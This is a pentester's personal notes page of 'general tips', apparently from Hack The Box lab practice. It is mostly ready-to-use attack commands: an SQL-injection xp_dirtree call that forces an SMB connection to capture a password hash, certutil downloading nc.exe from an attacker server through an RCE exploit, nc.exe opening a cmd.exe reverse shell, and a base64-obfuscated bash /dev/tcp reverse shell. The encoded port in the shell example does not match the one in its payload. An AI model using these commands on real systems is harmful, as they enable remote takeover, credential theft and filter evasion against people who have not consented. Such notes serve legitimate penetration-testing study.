Undergrad CyberSec Notes
  • About Me
  • Course Reviews
    • Certified Red Team Expert
  • Walkthroughs (OSCE)
    • Introduction
    • Vulnserver - TRUN Command
    • Vulnserver - GMON Command
    • Vulnserver - HTER Command
    • Vulnserver - LTER Command
    • Vulnserver - KSTET Command
    • Vulnserver - GTER Command
    • Exploiting HP OpenView NNM - B.07.53
  • Walkthroughs (OSCP)
    • Introduction
    • Vulnhub - Cynix
    • Vulnhub - MyExpense
    • Hack The Box - Monteverde
    • Hack The Box - Control
    • Hack The Box - Resolute
    • Hack The Box - Sauna
  • Active Directory - Enumeration
    • PowerView CheatSheet
  • Active Directory - ACL Abuse
    • WriteOwner Exploit
    • GenericWrite Exploit
    • Self Exploit
  • Privilege Escalation
    • Windows Priv Esc
  • Powershell
    • Basic PowerShell for Pentesters
    • Powershell
  • Useful Commands
    • General Tips
  • Active Directory Enumeration Cheetsheet
Powered by GitBook
On this page
  • Transferring Files to Windows Via Windows Command Execution
  • RCE Payload Workarounds:
  • java.lang.Runtime.exec:

Was this helpful?

  1. Useful Commands

General Tips

PreviousPowershellNextActive Directory Enumeration Cheetsheet

Last updated 4 years ago

Was this helpful?

Getting a reverse shell via sql injection to capture password hash -

EXEC MASTER.sys.xp_dirtree '\10.10.14.209\fakeshare

There are many ways to phrase password - ensure you check spelling

find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"

Transferring Files to Windows Via Windows Command Execution

On Attacker PC host payload on simple webserver

Next download the file on to the victims PC via RCE using certutil.

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe"

Next setup a listener on the attacker PC

Next on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC. 

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe"

RCE Payload Workarounds:

java.lang.Runtime.exec:

// RCE COMMAND
johnd@kali:~/HackTheBox$ echo 'bash -i >& /dev/tcp/10.10.14.14/8899 0>&1' | base64 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK

// PAYLOAD
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODg4IDA+JjEK=}|{base64,-d}|{bash,-i}

https://0xrick.github.io/hack-the-box/giddy/
Hosting NC.exe on Attacker PC
RCE on Windows Host
Log on Attcker PC Showing File Successfully Downloaded
NC Listener on port 8090
Called NC.exe
Successfully gained reverse shell